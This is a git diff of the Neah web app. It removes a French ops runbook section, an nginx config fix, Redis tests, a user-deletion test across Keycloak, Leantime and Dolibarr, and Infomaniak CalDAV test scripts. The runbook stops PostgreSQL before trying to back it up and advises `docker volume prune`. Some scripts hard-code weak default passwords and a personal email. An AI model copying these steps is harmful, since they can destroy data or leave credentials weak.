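-docker exec neah-redis-prod redis-cli PING | grep -q PONG
-echo "All checks passed at $(date)"
-```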
Métriques Vercel - -- Consulter Vercel Dashboard → Analytics -- Vérifier: - - Taux d'erreur (< 1%) - - Temps de réponse (< 500ms) - - Trafic normal - -### Tâches hebdomadaires - -#### Sauvegarde de la base de données - -```bash -#!/bin/bash -# scripts/backup-db.sh - -BACKUP_DIR="/opt/neah/backups" -DATE=$(date +%Y%m%d_%H%M%S) -BACKUP_FILE="$BACKUP_DIR/backup_$DATE.sql.gz" - -mkdir -p "$BACKUP_DIR" - -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db | gzip > "$BACKUP_FILE" - -# Garder uniquement les 7 derniers backups -ls -t $BACKUP_DIR/backup_*.sql.gz | tail -n +8 | xargs rm -f - -echo "Backup créé: $BACKUP_FILE" -``` - -**Automatisation avec cron:** - -```bash -# Ajouter à crontab (crontab -e) -0 2 * * * /opt/neah/scripts/backup-db.sh >> /var/log/neah-backup.log 2>&1 -``` - -#### Nettoyage des logs - -```bash -# Nettoyer les anciens logs Docker (garder 7 jours) -docker system prune -f --filter "until=168h" -``` - ---- - -## Incidents - -### Procédure générale - -1. **Identifier le problème** - - Consulter les logs Vercel - - Vérifier l'endpoint `/api/health` - - Vérifier les logs PostgreSQL/Redis - -2. **Évaluer l'impact** - - Nombre d'utilisateurs affectés - - Fonctionnalités impactées - - Criticité (P1, P2, P3) - -3. **Contenir le problème** - - Rollback si nécessaire (voir section Rollback) - - Désactiver les fonctionnalités problématiques - - Communiquer avec les utilisateurs - -4. **Résoudre** - - Corriger le problème - - Tester en staging - - Déployer en production - -5. **Post-mortem** - - Documenter l'incident - - Identifier les causes racines - - Mettre en place des mesures préventives - -### Scénarios courants - -#### Scénario 1: Application inaccessible (503) - -**Symptômes:** -- Erreur 503 sur toutes les pages -- Health check échoue - -**Actions:** - -1. Vérifier Vercel Dashboard → Deployments -2. Vérifier les logs Vercel -3. Vérifier la connexion à PostgreSQL: - -```bash -# Tester la connexion -psql $DATABASE_URL -c "SELECT 1;" -``` - -4. Vérifier les variables d'environnement dans Vercel -5. Si problème persistant, rollback vers version précédente - -#### Scénario 2: Erreurs de base de données - -**Symptômes:** -- Erreurs "Connection refused" ou "Connection timeout" -- Health check indique `database: error` - -**Actions:** - -1. Vérifier l'état du conteneur PostgreSQL: - -```bash -docker ps | grep neah-postgres-prod -docker logs neah-postgres-prod --tail 50 -``` - -2. Vérifier les ressources: - -```bash -docker stats neah-postgres-prod -``` - -3. Redémarrer si nécessaire: - -```bash -docker restart neah-postgres-prod -``` - -4. Vérifier la connexion après redémarrage - -#### Scénario 3: Performance dégradée - -**Symptômes:** -- Temps de réponse élevés -- Timeouts fréquents - -**Actions:** - -1. Identifier les requêtes lentes: - -```sql --- Requêtes les plus lentes -SELECT - query, - calls, - mean_exec_time, - max_exec_time -FROM pg_stat_statements -ORDER BY mean_exec_time DESC -LIMIT 10; -``` - -2. Vérifier les index manquants: - -```sql --- Tables sans index -SELECT - schemaname, - tablename, - attname, - n_distinct, - correlation -FROM pg_stats -WHERE schemaname = 'public' - AND n_distinct > 100 - AND correlation < 0.1; -``` - -3. Optimiser les requêtes ou ajouter des index - -4. Vérifier l'utilisation de Redis (cache) - -#### Scénario 4: Erreurs d'authentification Keycloak - -**Symptômes:** -- Utilisateurs ne peuvent pas se connecter -- Erreurs "Invalid token" ou "Authentication failed" - -**Actions:** - -1. 
Vérifier la configuration Keycloak dans Vercel -2. Vérifier que Keycloak est accessible: - -```bash -curl https://keycloak.example.com/realms/neah/.well-known/openid-configuration -``` - -3. Vérifier les tokens dans les logs -4. Contacter l'administrateur Keycloak si nécessaire - ---- - -## Rollback - -### Rollback Vercel - -#### Méthode 1: Via Dashboard (Recommandé) - -1. Aller dans Vercel Dashboard → Deployments -2. Trouver le déploiement précédent (stable) -3. Cliquer sur "..." → "Promote to Production" -4. Confirmer le rollback - -#### Méthode 2: Via CLI - -```bash -# Lister les déploiements -vercel ls - -# Rollback vers un déploiement spécifique -vercel rollback [deployment-url] -``` - -### Rollback de migration Prisma - -**ATTENTION:** Les rollbacks de migration peuvent être destructifs. Toujours tester en staging d'abord. - -#### Méthode 1: Migration de rollback - -Si une migration de rollback existe: - -```bash -export DATABASE_URL="postgresql://..." -npx prisma migrate resolve --rolled-back [migration-name] -npx prisma migrate deploy -``` - -#### Méthode 2: Restauration depuis sauvegarde - -```bash -# Arrêter l'application si nécessaire -# Restaurer la sauvegarde -cat backup_20240112_120000.sql | docker exec -i neah-postgres-prod psql -U neah_prod_user calendar_db - -# OU avec compression -gunzip < backup_20240112_120000.sql.gz | docker exec -i neah-postgres-prod psql -U neah_prod_user calendar_db - -# Vérifier l'intégrité -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c "SELECT COUNT(*) FROM \"User\";" -``` - -### Procédure complète de rollback - -1. **Évaluer l'impact** - - Identifier les changements à annuler - - Vérifier les dépendances - -2. **Sauvegarder l'état actuel** - -```bash -# Sauvegarde avant rollback -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db > backup_before_rollback_$(date +%Y%m%d_%H%M%S).sql -``` - -3. **Rollback Vercel** (voir ci-dessus) - -4. **Rollback base de données** (si nécessaire) - -5. **Vérifier** - -```bash -# Tester l'endpoint de santé -curl https://votre-domaine.vercel.app/api/health - -# Tester les fonctionnalités critiques -``` - -6. 
**Communiquer** - -- Informer l'équipe du rollback -- Documenter la raison du rollback -- Planifier la correction du problème - ---- - -## Maintenance - -### Maintenance planifiée - -#### Mise à jour des dépendances - -```bash -# Vérifier les mises à jour -npm outdated - -# Mettre à jour (une dépendance à la fois) -npm update [package-name] - -# Tester en local -npm run build -npm run dev - -# Tester en staging avant production -``` - -#### Mise à jour PostgreSQL - -```bash -# Arrêter le conteneur -docker stop neah-postgres-prod - -# Sauvegarder -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db > backup_before_upgrade.sql - -# Mettre à jour l'image dans docker-compose.prod.yml -# postgres:15-alpine → postgres:16-alpine - -# Redémarrer -docker-compose -f docker-compose.prod.yml up -d db - -# Vérifier -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c "SELECT version();" -``` - -#### Nettoyage de la base de données - -```sql --- Analyser les tables -ANALYZE; - --- VACUUM (nettoyage) -VACUUM ANALYZE; - --- Vérifier les tables orphelines -SELECT - schemaname, - tablename, - pg_size_pretty(pg_total_relation_size(schemaname||'.'||tablename)) AS size -FROM pg_tables -WHERE schemaname = 'public' -ORDER BY pg_total_relation_size(schemaname||'.'||tablename) DESC; -``` - -### Maintenance d'urgence - -#### Redémarrage des services - -```bash -# Redémarrer PostgreSQL -docker restart neah-postgres-prod - -# Redémarrer Redis -docker restart neah-redis-prod - -# Redémarrer tous les services -docker-compose -f docker-compose.prod.yml restart -``` - -#### Libération d'espace disque - -```bash -# Vérifier l'espace disque -df -h - -# Nettoyer les images Docker non utilisées -docker image prune -a - -# Nettoyer les volumes non utilisés -docker volume prune - -# Nettoyer les anciens logs -journalctl --vacuum-time=7d -``` - ---- - -## Contacts - -### Équipe Neah - -- **DevOps**: [email] -- **Développement**: [email] -- **Support**: [email] - -### Services externes - -- **Vercel Support**: https://vercel.com/support -- **Keycloak Admin**: [contact] -- **PostgreSQL**: [contact serveur] - -### Escalade - -1. **Niveau 1**: Équipe Neah -2. **Niveau 2**: Administrateur système -3. 
**Niveau 3**: Direction technique - ---- - -## Annexes - -### Commandes utiles - -```bash -# Vérifier les logs en temps réel -vercel logs --follow - -# Vérifier l'état des migrations -npx prisma migrate status - -# Tester la connexion PostgreSQL -psql $DATABASE_URL -c "SELECT version();" - -# Statistiques PostgreSQL -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c " -SELECT - datname, - numbackends, - xact_commit, - xact_rollback, - blks_read, - blks_hit -FROM pg_stat_database -WHERE datname = 'calendar_db'; -" - -# Statistiques Redis -docker exec neah-redis-prod redis-cli INFO stats -``` - -### Checklist de déploiement - -- [ ] Migrations testées en staging -- [ ] Variables d'environnement à jour -- [ ] Build local réussi -- [ ] Sauvegarde de la base de données -- [ ] Migrations appliquées -- [ ] Déploiement Vercel réussi -- [ ] Health check OK -- [ ] Tests fonctionnels passés -- [ ] Logs vérifiés (pas d'erreurs) - -### Checklist de rollback - -- [ ] Sauvegarde avant rollback créée -- [ ] Déploiement précédent identifié -- [ ] Rollback Vercel effectué -- [ ] Rollback base de données (si nécessaire) -- [ ] Health check OK -- [ ] Tests fonctionnels passés -- [ ] Équipe informée -- [ ] Problème documenté diff --git a/index.js b/index.js deleted file mode 100644 index e1d1274..0000000 --- a/index.js +++ /dev/null @@ -1,2 +0,0 @@ -// Main entry point for Electron app -require('./electron/main'); \ No newline at end of file diff --git a/logo.png b/logo.png deleted file mode 100644 index 26a8c68..0000000 Binary files a/logo.png and /dev/null differ diff --git a/nginx-config-fix.conf b/nginx-config-fix.conf deleted file mode 100644 index f4f7e20..0000000 --- a/nginx-config-fix.conf +++ /dev/null @@ -1,33 +0,0 @@ -# Configuration Nginx pour corriger l'erreur "upstream sent too big header" -# À ajouter dans votre configuration Nginx pour hub.slm-lab.net - -server { - # ... votre config existante ... - - # ============================================ - # FIX: Augmenter la limite des headers - # ============================================ - # Ces directives augmentent la taille maximale des headers - # pour permettre les gros cookies NextAuth (JWT avec tokens Keycloak) - - # Taille des buffers pour les headers - proxy_buffer_size 16k; - proxy_buffers 8 16k; - proxy_busy_buffers_size 32k; - - # Limite pour les gros headers clients (et réponses) - large_client_header_buffers 4 32k; - - # Hash tables pour les headers (optionnel mais recommandé) - proxy_headers_hash_max_size 512; - proxy_headers_hash_bucket_size 128; - - # Timeouts (pour éviter les timeouts pendant le traitement) - proxy_connect_timeout 60s; - proxy_send_timeout 60s; - proxy_read_timeout 60s; - - # ... reste de votre config ... -} - - diff --git a/package.json b/package.json index 4ace3e2..55f4f69 100644 --- a/package.json +++ b/package.json @@ -2,7 +2,6 @@ "name": "neah", "version": "0.1.0", "private": true, - "main": "index.js", "description": "Neah Web Application", "author": "Neah Team", "scripts": { diff --git a/scripts/test-redis-env.js b/scripts/test-redis-env.js deleted file mode 100644 index aa715dc..0000000 --- a/scripts/test-redis-env.js +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env node -require('dotenv').config(); - -const Redis = require('ioredis'); - -console.log('Redis configuration from environment:'); -console.log('- Host:', process.env.REDIS_HOST); -console.log('- Port:', process.env.REDIS_PORT); -console.log('- Password:', process.env.REDIS_PASSWORD ? 
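-  // NB: masked on purpose; log only whether a password is set, never its value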
'******** (set)' : '(not set)'); - -const redis = new Redis({ - host: process.env.REDIS_HOST, - port: process.env.REDIS_PORT ? parseInt(process.env.REDIS_PORT) : undefined, - password: process.env.REDIS_PASSWORD, - maxRetriesPerRequest: 3, - retryStrategy: (times) => Math.min(times * 100, 3000) -}); - -redis.on('connect', () => { - console.log('✅ Connected to Redis successfully!'); - - // Test a simple operation - redis.set('test-key', 'Test value from environment test') - .then(() => redis.get('test-key')) - .then((value) => { - console.log('✅ Successfully set and retrieved a test key:', value); - redis.quit(); - }) - .catch((err) => { - console.error('❌ Error during Redis operations:', err); - redis.quit(); - process.exit(1); - }); -}); - -redis.on('error', (err) => { - console.error('❌ Redis connection error:', err); - process.exit(1); -}); - -// Add a timeout to avoid hanging indefinitely -setTimeout(() => { - console.error('❌ Connection timeout'); - process.exit(1); -}, 5000); \ No newline at end of file diff --git a/scripts/test-redis.js b/scripts/test-redis.js deleted file mode 100644 index 9d008ed..0000000 --- a/scripts/test-redis.js +++ /dev/null @@ -1,68 +0,0 @@ -#!/usr/bin/env node - -const Redis = require('ioredis'); -const dotenv = require('dotenv'); - -// Load environment variables -dotenv.config({ path: '.env.local' }); - -const redisUrl = process.env.REDIS_URL || 'redis://:mySecretPassword@localhost:6379'; - -// Connect to Redis -const redis = new Redis(redisUrl, { - retryStrategy: (times) => { - const delay = Math.min(times * 50, 2000); - return delay; - } -}); - -// Test functions -async function testRedisConnection() { - try { - // Test basic connection - console.log('Testing Redis connection...'); - await redis.ping(); - console.log('✅ Redis connection successful!'); - - // Test setting a key - console.log('\nTesting setting a key...'); - await redis.set('test-key', 'Hello from Redis test script'); - console.log('✅ Successfully set test-key'); - - // Test getting a key - console.log('\nTesting getting a key...'); - const value = await redis.get('test-key'); - console.log(`✅ Successfully retrieved test-key: "${value}"`); - - // Test expiry - console.log('\nTesting key expiration...'); - await redis.set('expiring-key', 'This will expire in 5 seconds', 'EX', 5); - console.log('✅ Set key with 5 second expiration'); - console.log('Waiting for key to expire...'); - - // Wait for expiration - await new Promise(resolve => setTimeout(resolve, 6000)); - - const expiredValue = await redis.get('expiring-key'); - if (expiredValue === null) { - console.log('✅ Key successfully expired'); - } else { - console.log('❌ Key did not expire as expected'); - } - - // Clean up - console.log('\nCleaning up...'); - await redis.del('test-key'); - console.log('✅ Removed test keys'); - - console.log('\n🎉 All Redis tests passed!'); - } catch (error) { - console.error('❌ Redis test failed:', error); - } finally { - // Close connection - redis.disconnect(); - } -} - -// Run the test -testRedisConnection(); \ No newline at end of file diff --git a/scripts/test-user-deletion.js b/scripts/test-user-deletion.js deleted file mode 100644 index 5b80504..0000000 --- a/scripts/test-user-deletion.js +++ /dev/null @@ -1,273 +0,0 @@ -/** - * Test script for verifying user deletion across all integrated systems - * - * This script creates a test user with mediation role, verifies it exists in all systems, - * then deletes it and verifies deletion in all systems. 
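- * Systems exercised: Keycloak (admin REST API), Leantime (JSON-RPC) and
- * Dolibarr (REST API), plus the app's own /api/users endpoints.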
- * - * Usage: node scripts/test-user-deletion.js - */ - -require('dotenv').config(); -const fetch = require('node-fetch'); - -// Test user configuration -const TEST_USER = { - username: `test-user-${Date.now()}`, - firstName: 'Test', - lastName: 'User', - email: `test-user-${Date.now()}@example.com`, - password: 'password123', - roles: ['mediation'] // Using mediation role which should be created in Dolibarr -}; - -// Configuration from environment variables -const config = { - keycloak: { - baseUrl: process.env.KEYCLOAK_BASE_URL, - realm: process.env.KEYCLOAK_REALM, - clientId: process.env.KEYCLOAK_CLIENT_ID, - clientSecret: process.env.KEYCLOAK_CLIENT_SECRET - }, - leantime: { - apiUrl: 'https://agilite.slm-lab.net/api/jsonrpc', - apiKey: process.env.LEANTIME_TOKEN - }, - dolibarr: { - apiUrl: process.env.DOLIBARR_API_URL, - apiKey: process.env.DOLIBARR_API_KEY - }, - nextAuthUrl: process.env.NEXTAUTH_URL || 'http://localhost:3000' -}; - -// Helper to get admin token for Keycloak operations -async function getKeycloakAdminToken() { - const response = await fetch( - `${config.keycloak.baseUrl}/realms/${config.keycloak.realm}/protocol/openid-connect/token`, - { - method: 'POST', - headers: { - 'Content-Type': 'application/x-www-form-urlencoded', - }, - body: new URLSearchParams({ - grant_type: 'client_credentials', - client_id: config.keycloak.clientId, - client_secret: config.keycloak.clientSecret, - }), - } - ); - - const data = await response.json(); - if (!response.ok || !data.access_token) { - throw new Error('Failed to get Keycloak admin token'); - } - - return data.access_token; -} - -// Create a test user in all systems via the API -async function createTestUser() { - console.log(`Creating test user: ${TEST_USER.username} (${TEST_USER.email})`); - - const response = await fetch(`${config.nextAuthUrl}/api/users`, { - method: 'POST', - headers: { - 'Content-Type': 'application/json', - }, - body: JSON.stringify(TEST_USER), - }); - - if (!response.ok) { - const error = await response.json(); - throw new Error(`Failed to create test user: ${JSON.stringify(error)}`); - } - - const data = await response.json(); - console.log('User created successfully:', data); - return data.user; -} - -// Check if user exists in Keycloak -async function checkKeycloakUser(userId) { - console.log(`Checking if user exists in Keycloak (ID: ${userId})`); - const token = await getKeycloakAdminToken(); - - const response = await fetch( - `${config.keycloak.baseUrl}/admin/realms/${config.keycloak.realm}/users/${userId}`, - { - headers: { - Authorization: `Bearer ${token}`, - }, - } - ); - - if (response.status === 404) { - console.log('User not found in Keycloak'); - return false; - } - - if (!response.ok) { - console.error('Error checking Keycloak user:', await response.text()); - return null; // Error state - } - - console.log('User exists in Keycloak'); - return true; -} - -// Check if user exists in Leantime -async function checkLeantimeUser(email) { - console.log(`Checking if user exists in Leantime (Email: ${email})`); - - try { - const response = await fetch(config.leantime.apiUrl, { - method: 'POST', - headers: { - 'Content-Type': 'application/json', - 'X-API-Key': config.leantime.apiKey, - }, - body: JSON.stringify({ - method: 'leantime.rpc.Users.Users.getUserIdByEmail', - jsonrpc: '2.0', - id: 1, - params: { - email: email - } - }) - }); - - const data = await response.json(); - if (!response.ok || !data.result) { - console.log('User not found in Leantime'); - return false; - } - - console.log('User 
exists in Leantime'); - return true; - } catch (error) { - console.error('Error checking Leantime user:', error); - return null; // Error state - } -} - -// Check if user exists in Dolibarr -async function checkDolibarrUser(email) { - console.log(`Checking if user exists in Dolibarr (Email: ${email})`); - - try { - const apiUrl = config.dolibarr.apiUrl.endsWith('/') - ? config.dolibarr.apiUrl - : `${config.dolibarr.apiUrl}/`; - - const response = await fetch( - `${apiUrl}users?sortfield=t.rowid&sortorder=ASC&limit=1&sqlfilters=(t.email:=:'${encodeURIComponent(email)}')`, - { - method: 'GET', - headers: { - 'DOLAPIKEY': config.dolibarr.apiKey, - }, - } - ); - - if (!response.ok) { - console.error('Error response from Dolibarr:', await response.text()); - return null; // Error state - } - - const data = await response.json(); - if (!Array.isArray(data) || data.length === 0) { - console.log('User not found in Dolibarr'); - return false; - } - - console.log('User exists in Dolibarr with ID:', data[0].id); - return { exists: true, id: data[0].id }; - } catch (error) { - console.error('Error checking Dolibarr user:', error); - return null; // Error state - } -} - -// Delete user from all systems via the API -async function deleteTestUser(userId, email) { - console.log(`Deleting test user: ID=${userId}, Email=${email}`); - - const response = await fetch( - `${config.nextAuthUrl}/api/users?id=${userId}&email=${encodeURIComponent(email)}`, - { - method: 'DELETE', - } - ); - - if (!response.ok) { - const error = await response.json(); - throw new Error(`Failed to delete test user: ${JSON.stringify(error)}`); - } - - console.log('User deletion request successful'); - return await response.json(); -} - -// Main test function -async function runTest() { - try { - console.log('=== STARTING USER DELETION TEST ==='); - - // Step 1: Create a test user - console.log('\n=== Step 1: Creating test user ==='); - const createdUser = await createTestUser(); - console.log(`Test user created with ID: ${createdUser.id}`); - - // Wait a moment for systems to process - console.log('Waiting for systems to process...'); - await new Promise(resolve => setTimeout(resolve, 2000)); - - // Step 2: Verify user exists in all systems - console.log('\n=== Step 2: Verifying user exists in all systems ==='); - const keycloakExists = await checkKeycloakUser(createdUser.id); - const leantimeExists = await checkLeantimeUser(TEST_USER.email); - const dolibarrUser = await checkDolibarrUser(TEST_USER.email); - - if (keycloakExists === null || leantimeExists === null || dolibarrUser === null) { - throw new Error('Error checking user existence in integrated systems'); - } - - if (!keycloakExists || !leantimeExists || !dolibarrUser.exists) { - throw new Error('User not created in all systems properly'); - } - - console.log('User confirmed to exist in all integrated systems'); - - // Step 3: Delete the test user - console.log('\n=== Step 3: Deleting test user ==='); - await deleteTestUser(createdUser.id, TEST_USER.email); - - // Wait a moment for systems to process - console.log('Waiting for systems to process deletion...'); - await new Promise(resolve => setTimeout(resolve, 2000)); - - // Step 4: Verify user has been deleted from all systems - console.log('\n=== Step 4: Verifying user deletion from all systems ==='); - const keycloakDeleted = !(await checkKeycloakUser(createdUser.id)); - const leantimeDeleted = !(await checkLeantimeUser(TEST_USER.email)); - const dolibarrDeleted = !(await checkDolibarrUser(TEST_USER.email)).exists; - - 
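-    // NB: the dolibarrDeleted check above relies on checkDolibarrUser returning
-    // { exists, id } or false (false.exists is simply undefined in JS); a null
-    // error state would throw here, which is acceptable for a test script.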
console.log('\n=== TEST RESULTS ===');
-    console.log(`Keycloak user deleted: ${keycloakDeleted ? 'YES' : 'NO'}`);
-    console.log(`Leantime user deleted: ${leantimeDeleted ? 'YES' : 'NO'}`);
-    console.log(`Dolibarr user deleted: ${dolibarrDeleted ? 'YES' : 'NO'}`);
-
-    if (keycloakDeleted && leantimeDeleted && dolibarrDeleted) {
-      console.log('\n✅ TEST PASSED: User successfully deleted from all systems');
-    } else {
-      console.log('\n❌ TEST FAILED: User not deleted from all systems');
-    }
-
-  } catch (error) {
-    console.error('\n❌ TEST ERROR:', error);
-  }
-
-  console.log('\n=== TEST COMPLETED ===');
-}
-
-// Run the test
-runTest();
\ No newline at end of file
diff --git a/test-infomaniak-caldav-simple.sh b/test-infomaniak-caldav-simple.sh
deleted file mode 100755
index 7bff5ce..0000000
--- a/test-infomaniak-caldav-simple.sh
+++ /dev/null
@@ -1,70 +0,0 @@
-#!/bin/bash
-
-# Script de test simple pour la connexion CalDAV Infomaniak
-# Usage: ./test-infomaniak-caldav-simple.sh <email> <password>
-
-EMAIL="${1:-a.tmiri@icmaae.foundation}"
-PASSWORD="${2}"
-
-if [ -z "$PASSWORD" ]; then
-  echo "❌ Usage: $0 <email> <password>"
-  echo ""
-  echo "Example:"
-  echo "  $0 a.tmiri@icmaae.foundation 'your-password'"
-  exit 1
-fi
-
-BASE_URL="https://sync.infomaniak.com/caldav"
-
-echo "🔍 Test CalDAV Infomaniak"
-echo "Email: $EMAIL"
-echo "URL: $BASE_URL"
-echo ""
-
-# Test PROPFIND (méthode principale utilisée par le code)
-echo "📡 Test PROPFIND..."
-HTTP_CODE=$(curl -s -o /tmp/caldav-response.xml -w "%{http_code}" \
-  -X PROPFIND \
-  -u "${EMAIL}:${PASSWORD}" \
-  -H "Depth: 1" \
-  -H "Content-Type: application/xml" \
-  --data-binary '<?xml version="1.0" encoding="utf-8" ?>
-<d:propfind xmlns:d="DAV:">
-  <d:prop>
-    <d:displayname />
-    <d:resourcetype />
-  </d:prop>
-</d:propfind>' \
-  "${BASE_URL}/")
-
-echo "HTTP Status: $HTTP_CODE"
-echo ""
-
-if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "207" ]; then
-  echo "✅ SUCCESS - Connexion réussie!"
-  echo ""
-  echo "Calendriers trouvés:"
-  grep -o "<d:displayname>[^<]*</d:displayname>" /tmp/caldav-response.xml | sed 's/<[^>]*>//g' | nl
-  echo ""
-  echo "Réponse complète sauvegardée dans /tmp/caldav-response.xml"
-elif [ "$HTTP_CODE" = "401" ]; then
-  echo "❌ ERREUR 401 - Non autorisé"
-  echo ""
-  echo "Causes possibles:"
-  echo "  1. Mot de passe incorrect"
-  echo "  2. 2FA activé - utilisez un mot de passe d'application"
-  echo "  3. Compte suspendu"
-  echo ""
-  echo "Pour générer un mot de passe d'application Infomaniak:"
-  echo "  1. Connectez-vous à https://config.infomaniak.com"
-  echo "  2. Allez dans 'Mon profil' > 'Mots de passe d'application'"
-  echo "  3. Générez un nouveau mot de passe pour 'CalDAV'"
-  echo "  4. Utilisez ce mot de passe dans votre compte email"
-else
-  echo "❌ ERREUR HTTP $HTTP_CODE"
-  echo ""
-  echo "Réponse:"
-  cat /tmp/caldav-response.xml | head -20
-fi
-
-rm -f /tmp/caldav-response.xml
diff --git a/test-infomaniak-caldav.js b/test-infomaniak-caldav.js
deleted file mode 100644
index 494ac64..0000000
--- a/test-infomaniak-caldav.js
+++ /dev/null
@@ -1,142 +0,0 @@
-#!/usr/bin/env node
-
-/**
- * Script de test pour la connexion CalDAV Infomaniak
- * Usage: node test-infomaniak-caldav.js <email> <password>
- */
-
-const { createClient } = require('webdav');
-
-const email = process.argv[2] || 'a.tmiri@icmaae.foundation';
-const password = process.argv[3];
-
-if (!password) {
-  console.error('❌ Usage: node test-infomaniak-caldav.js <email> <password>');
-  console.error('');
-  console.error('Example:');
-  console.error('  node test-infomaniak-caldav.js a.tmiri@icmaae.foundation "your-password"');
-  process.exit(1);
-}
-
-const baseUrl = 'https://sync.infomaniak.com/caldav';
-
-console.log('🔍 Test CalDAV Infomaniak');
-console.log('Email:', email);
-console.log('URL:', baseUrl);
-console.log('Password length:', password.length);
-console.log('');
-
-async function testCalDAV() {
-  try {
-    console.log('📡 Création du client CalDAV...');
-    const client = createClient(baseUrl, {
-      username: email,
-      password: password,
-    });
-
-    console.log('📡 Test PROPFIND sur la racine (/)...');
-    const items = await client.getDirectoryContents('/');
-
-    console.log('✅ SUCCESS - Connexion réussie!');
-    console.log('');
-    console.log(`📅 ${items.length} élément(s) trouvé(s):`);
-    console.log('');
-
-    const calendars = items.filter(item => item.type === 'directory' && item.filename !== '/');
-
-    if (calendars.length === 0) {
-      console.log('⚠️ Aucun calendrier trouvé (seulement des fichiers)');
-    } else {
-      console.log('Calendriers:');
-      for (let i = 0; i < calendars.length; i++) {
-        const cal = calendars[i];
-        console.log(`  ${i + 1}. ${cal.basename || cal.filename}`);
-        console.log(`     Chemin: ${cal.filename}`);
-        console.log(`     Type: ${cal.type}`);
-
-        // Essayer de récupérer les propriétés du calendrier
-        try {
-          const props = await client.customRequest(cal.filename, {
-            method: 'PROPFIND',
-            headers: {
-              Depth: '0',
-              'Content-Type': 'application/xml',
-            },
-            data: `<?xml version="1.0" encoding="utf-8" ?>
-<d:propfind xmlns:d="DAV:" xmlns:c="http://apple.com/ns/ical/">
-  <d:prop>
-    <d:displayname />
-    <c:calendar-color />
-  </d:prop>
-</d:propfind>`,
-          });
-
-          // Parser le XML pour extraire le displayname
-          const displayNameMatch = props.data.match(/<d:displayname[^>]*>([^<]+)<\/d:displayname>/i);
-          const colorMatch = props.data.match(/<c:calendar-color[^>]*>([^<]+)<\/c:calendar-color>/i);
-
-          if (displayNameMatch) {
-            console.log(`     Nom: ${displayNameMatch[1]}`);
-          }
-          if (colorMatch) {
-            console.log(`     Couleur: ${colorMatch[1]}`);
-          }
-        } catch (propError) {
-          console.log(`     ⚠️ Impossible de récupérer les propriétés: ${propError.message}`);
-        }
-        console.log('');
-      }
-    }
-
-    console.log('==========================================');
-    console.log('✅ La connexion CalDAV fonctionne correctement');
-    console.log('   Si le code Node.js échoue, le problème est dans la bibliothèque webdav');
-    console.log('   ou dans la configuration du client.');
-    console.log('==========================================');
-
-  } catch (error) {
-    console.error('❌ ERREUR');
-    console.error('');
-    console.error('Type:', error.constructor.name);
-    console.error('Message:', error.message);
-
-    if (error.status === 401 || error.response?.status === 401) {
-      console.error('');
-      console.error('🔐 Erreur 401 - Non autorisé');
-      console.error('');
-      console.error('Causes possibles:');
-      console.error('  1. Mot de passe incorrect');
-      console.error('  2. 2FA activé - utilisez un mot de passe d\'application');
-      console.error('  3. Compte suspendu ou désactivé');
-      console.error('  4. Email incorrect');
-      console.error('');
-      console.error('Pour générer un mot de passe d\'application Infomaniak:');
-      console.error('  1. Connectez-vous à https://config.infomaniak.com');
-      console.error('  2. Allez dans "Mon profil" > "Mots de passe d\'application"');
-      console.error('  3. Générez un nouveau mot de passe pour "CalDAV"');
-      console.error('  4. Utilisez ce mot de passe dans votre compte email');
-    } else {
-      console.error('');
-      console.error('Détails de l\'erreur:');
-      if (error.status) {
-        console.error('  Status:', error.status);
-      }
-      if (error.statusText) {
-        console.error('  Status Text:', error.statusText);
-      }
-      if (error.response) {
-        console.error('  Response Status:', error.response.status);
-        console.error('  Response Status Text:', error.response.statusText);
-      }
-      if (error.stack) {
-        console.error('');
-        console.error('Stack trace:');
-        console.error(error.stack.split('\n').slice(0, 5).join('\n'));
-      }
-    }
-
-    process.exit(1);
-  }
-}
-
-testCalDAV();
diff --git a/test-infomaniak-caldav.sh b/test-infomaniak-caldav.sh
deleted file mode 100644
index 1295958..0000000
--- a/test-infomaniak-caldav.sh
+++ /dev/null
@@ -1,147 +0,0 @@
-#!/bin/bash
-
-# Script de test pour la connexion CalDAV Infomaniak
-# Usage: ./test-infomaniak-caldav.sh <email> <password>
-
-EMAIL="${1:-a.tmiri@icmaae.foundation}"
-PASSWORD="${2}"
-
-if [ -z "$PASSWORD" ]; then
-  echo "Usage: $0 <email> <password>"
-  echo "Example: $0 a.tmiri@icmaae.foundation 'your-password'"
-  exit 1
-fi
-
-BASE_URL="https://sync.infomaniak.com/caldav"
-
-echo "=========================================="
-echo "Test de connexion CalDAV Infomaniak"
-echo "=========================================="
-echo "Email: $EMAIL"
-echo "Base URL: $BASE_URL"
-echo "Password length: ${#PASSWORD}"
-echo ""
-
-# Test 1: PROPFIND sur la racine
-echo "Test 1: PROPFIND sur la racine (/)"
-echo "-----------------------------------"
-RESPONSE=$(curl -s -w "\nHTTP_CODE:%{http_code}" \
-  -X PROPFIND \
-  -u "${EMAIL}:${PASSWORD}" \
-  -H "Depth: 1" \
-  -H "Content-Type: application/xml" \
-  --data-binary '<?xml version="1.0" encoding="utf-8" ?>
-<d:propfind xmlns:d="DAV:">
-  <d:prop>
-    <d:displayname />
-    <d:resourcetype />
-  </d:prop>
-</d:propfind>' \
-  "${BASE_URL}/")
-
-HTTP_CODE=$(echo "$RESPONSE" | grep -o "HTTP_CODE:[0-9]*" | cut -d: -f2)
-BODY=$(echo "$RESPONSE" | sed '/HTTP_CODE:/d')
-
-echo "HTTP Status: $HTTP_CODE"
-if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "207" ]; then
-  echo "✅ SUCCESS - Connexion réussie!"
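-  # NB: 207 Multi-Status is the normal WebDAV success response to PROPFIND;
-  # a plain 200 is accepted here as well, to be safe.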
-  echo ""
-  echo "Réponse:"
-  echo "$BODY" | head -50
-else
-  echo "❌ FAILED - Erreur HTTP $HTTP_CODE"
-  echo ""
-  echo "Réponse complète:"
-  echo "$BODY"
-fi
-
-echo ""
-echo ""
-
-# Test 2: OPTIONS pour vérifier les capacités
-echo "Test 2: OPTIONS pour vérifier les capacités"
-echo "--------------------------------------------"
-RESPONSE2=$(curl -s -w "\nHTTP_CODE:%{http_code}" \
-  -X OPTIONS \
-  -u "${EMAIL}:${PASSWORD}" \
-  "${BASE_URL}/")
-
-HTTP_CODE2=$(echo "$RESPONSE2" | grep -o "HTTP_CODE:[0-9]*" | cut -d: -f2)
